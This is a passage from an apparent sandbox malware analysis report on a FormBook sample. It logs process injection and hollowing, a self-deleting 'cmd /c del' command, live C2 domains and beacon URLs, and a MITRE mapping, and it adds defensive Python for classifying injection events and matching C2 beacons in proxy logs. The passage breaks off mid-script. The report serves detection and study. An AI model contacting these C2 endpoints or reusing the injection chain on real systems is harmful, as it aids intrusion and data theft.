            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D9927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E1EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D6766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D55210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D73A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D88E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D68A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E0FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E11608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D5E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D7DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D68794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04E25BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04D8B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exe Code function: 4_2_04DD7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Process token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exe Process token adjusted: Debug
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe Network Connect: 3.138.72.189 80
            Source: C:\Windows\explorer.exe Network Connect: 198.49.23.141 80
            Source: C:\Windows\explorer.exe Network Connect: 162.0.232.118 80
            Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign process
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread register set: target process: 3388
            Source: C:\Windows\SysWOW64\raserver.exe Thread register set: target process: 3388
            Queues an APC in another process (thread injection)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing technique
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1170000
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E6C008
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.253425578.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Users\user\Desktop\vOKMFxiCYt.exe VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
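
The injection rows above are the raw evidence behind the process-injection and hollowing signatures: the sample spawns RegSvcs.exe, allocates an execute-read-write region at its image base 0x400000 and writes an MZ-headed image there; RegSvcs.exe then maps executable sections into explorer.exe and raserver.exe, rewrites a thread context, queues an APC in explorer.exe and unmaps a section in raserver.exe. The following Python script is an added example, not part of this report or of Joe Sandbox: it parses those rows (copied here as constructed input, with a separator between the Source and event columns) into per-edge event sets and applies this example's own rules to name the injection pattern on each source-to-target edge. The event labels, the rules in verdicts() and the pid: placeholder for the numeric thread target are assumptions made for illustration.

```python
import ntpath
import re
from collections import defaultdict

# Behaviour rows copied from this report's HIPS / Operating System Protection
# Evasion section (constructed input; " | " separates the Source column from
# the event column).
ROWS = r"""
Source: C:\Users\user\Desktop\vOKMFxiCYt.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\vOKMFxiCYt.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 3388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1170000
Source: C:\Users\user\Desktop\vOKMFxiCYt.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\vOKMFxiCYt.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E6C008
Source: C:\Users\user\Desktop\vOKMFxiCYt.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
"""

# Event vocabulary (this example's labels) with one pattern per sandbox row type.
# A row may match more than one pattern: an MZ write is also a remote write.
EVENTS = [
    ("rwx_alloc",      re.compile(r"Memory allocated: (?P<target>.+?) base: [0-9A-Fa-f]+ protect: .*execute")),
    ("pe_write",       re.compile(r"Memory written: (?P<target>.+?) base: [0-9A-Fa-f]+ value starts with: 4D5A")),
    ("remote_write",   re.compile(r"Memory written: (?P<target>.+?) base: [0-9A-Fa-f]+")),
    ("exec_mapping",   re.compile(r"Section loaded: unknown target: (?P<target>.+?) protection: .*execute")),
    ("thread_context", re.compile(r"Thread register set: target process: (?P<target>\S+)")),
    ("apc_queue",      re.compile(r"Thread APC queued: target process: (?P<target>.+)")),
    ("unmap_section",  re.compile(r"Section unmapped: (?P<target>.+?) base address: [0-9A-Fa-f]+")),
    ("create_process", re.compile(r"Process created: (?P<target>\S+)")),
]


def _name(target):
    """Image basename, or a pid: placeholder when the sandbox only logged a PID."""
    target = target.strip()
    return f"pid:{target}" if target.isdigit() else ntpath.basename(target)


def parse(rows):
    """Yield (source, label, target) for every pattern a row matches."""
    for line in rows.strip().splitlines():
        src, sep, event = line.partition(" | ")
        if not sep:
            continue
        src = src.strip()
        if src.startswith("Source: "):
            src = src[len("Source: "):]
        src = ntpath.basename(src)
        for label, pat in EVENTS:
            m = pat.match(event.strip())
            if m:
                yield src, label, _name(m.group("target"))


def chain(rows):
    """Map (source, target) -> sorted list of event labels seen on that edge."""
    edges = defaultdict(set)
    for src, label, tgt in parse(rows):
        edges[(src, tgt)].add(label)
    return {k: sorted(v) for k, v in edges.items()}


def verdicts(edges):
    """Name the injection pattern each edge's events add up to (example's own rules).

    An MZ-headed image written into a process the source itself spawned is
    hollowing-style PE injection; a section unmapped in a foreign process is
    the classic NtUnmapViewOfSection step; an APC or a rewritten thread
    context is how the mapped code gets scheduled.
    """
    out = {}
    for edge, labels in edges.items():
        seen = set(labels)
        v = []
        if {"create_process", "pe_write"} <= seen:
            v.append("PE injected into own child at image base (hollowing-style)")
        if "unmap_section" in seen:
            v.append("section unmapped in foreign process (hollowing)")
        if "apc_queue" in seen:
            v.append("APC queued in foreign process")
        if "thread_context" in seen:
            v.append("thread context rewritten in foreign process")
        if "exec_mapping" in seen and not v:
            v.append("executable section mapped into foreign process")
        if v:
            out[edge] = v
    return out


if __name__ == "__main__":
    for (src, tgt), v in verdicts(chain(ROWS)).items():
        print(f"{src} -> {tgt}: {'; '.join(v)}")
```

Run stand-alone it prints one line per injection edge, which is the same chain the behaviour graph draws: the sample into RegSvcs.exe, RegSvcs.exe into explorer.exe and raserver.exe, raserver.exe back into explorer.exe. The thread-context rows only name a PID, so they stay as a separate pid:3388 edge rather than being guessed onto explorer.exe.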

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules1 | Path Interception | Process Injection812 | Rootkit1 | Credential API Hooking1 | Security Software Discovery221 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading1 | Input Capture1 | Virtualization/Sandbox Evasion3 | Remote Desktop Protocol | Input Capture1 | Exfiltration Over Bluetooth | Ingress Tool Transfer3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion3 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Archive Collected Data1 | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol3 | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection812 | LSA Secrets | System Information Discovery112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information3 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |

            Behavior Graph

Behavior Graph ID: 321296 | Sample: vOKMFxiCYt.exe | Start date: 20/11/2020 | Architecture: WINDOWS | Score: 100

Signatures on the sample node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures

Process tree:
vOKMFxiCYt.exe (started)
    dropped: C:\Users\user\AppData\...\vOKMFxiCYt.exe.log, ASCII
    signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
    -> RegSvcs.exe (started)
        signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        -> explorer.exe (injected)
            DNS/IP: auctionpros.club 162.0.232.118, 49741, 80 NAMECHEAP-NETUS Canada; reem.pro 34.102.136.180, 49737, 80 GOOGLEUS United States; 6 other IPs or domains
            signatures: System process connects to network (likely due to code injection or exploit)
            -> raserver.exe (started)
                signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                -> cmd.exe (started)
                    -> conhost.exe (started)


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
vOKMFxiCYt.exe | 35% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla
vOKMFxiCYt.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
1.2.RegSvcs.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh | 0% | Avira URL Cloud | safe
http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP | 0% | Avira URL Cloud | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | 3.138.72.189 | true | false | | high
reem.pro | 34.102.136.180 | true | true | | unknown
auctionpros.club | 162.0.232.118 | true | true | | unknown
ext-cust.squarespace.com | 198.49.23.141 | true | false | | high
www.themaskedstitcher.com | unknown | unknown | true | | unknown
www.auctionpros.club | unknown | unknown | true | | unknown
www.reem.pro | unknown | unknown | true | | unknown
www.tessuto.net | unknown | unknown | true | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh | true | Avira URL Cloud: safe | unknown
http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh | true | Avira URL Cloud: safe | unknown
http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4 | true | Avira URL Cloud: safe | unknown
http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP | true | Avira URL Cloud: safe | unknown
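
All four contacted URLs share one path, /glt/, and the same two query parameters, V4 (a long base64-like value that differs per request) and SP (the constant cnxhAdAh), spread over four unrelated domains, which fits FormBook's known habit of rotating many domains under one per-build path and parameter set. The following Python is an added example, not part of the report or of any vendor tooling: it derives that shared profile from the URLs automatically, turns it into a regex for grepping proxy logs, and runs the equivalent parser-based check over a few constructed proxy log lines. The proxy log format, the client IPs and the timestamps are invented for the example; the assumption that the path and parameter names stay constant for this build (so a detection keyed on them is narrow but usable) is the example's, not the report's.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# The four C2 URLs from this report's Contacted URLs table.
C2_URLS = [
    "http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh",
    "http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh",
    "http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4",
    "http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP",
]

# Constructed proxy log (epoch, client IP, method, URL, status). Lines 1 and 3
# are the report's beacons percent-encoded the way a proxy would log them;
# lines 2 and 4 are near misses that must not match.
PROXY_LOG = """\
1605902645 10.0.0.5 GET http://www.reem.pro/glt/?V4=MLpAZ0AK%2FspUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh 200
1605902650 10.0.0.5 GET http://www.example.org/glt/?V4=abc 200
1605902660 10.0.0.7 GET http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf%2BkTtqMKofvvq54zDDgrcqehmcxCBUCamp%2F3E7fzZOB7U%2FXBgSeZZ5TRQ%2F%2F94zw4 200
1605902670 10.0.0.9 GET http://www.reem.pro/index.html 200
"""


def _query(url):
    """Split a URL and decode its query into a dict (last value wins)."""
    parts = urlsplit(url)
    return parts, dict(parse_qsl(parts.query, keep_blank_values=True))


def profile(urls):
    """Return (path, sorted parameter names, constant parameters) shared by
    every URL, or None when the URLs do not agree on path or parameter set."""
    paths, keysets, consts = set(), set(), None
    for u in urls:
        parts, q = _query(u)
        paths.add(parts.path)
        keysets.add(frozenset(q))
        # keep only parameters whose value is identical in every URL so far
        consts = dict(q) if consts is None else {k: v for k, v in consts.items() if q.get(k) == v}
    if len(paths) != 1 or len(keysets) != 1:
        return None
    return paths.pop(), sorted(keysets.pop()), consts


def is_beacon(url, prof):
    """Parser-based check: same path, same parameter set, constant values equal."""
    path, keys, consts = prof
    parts, q = _query(url)
    return parts.path == path and sorted(q) == keys and all(q.get(k) == v for k, v in consts.items())


def to_regex(prof):
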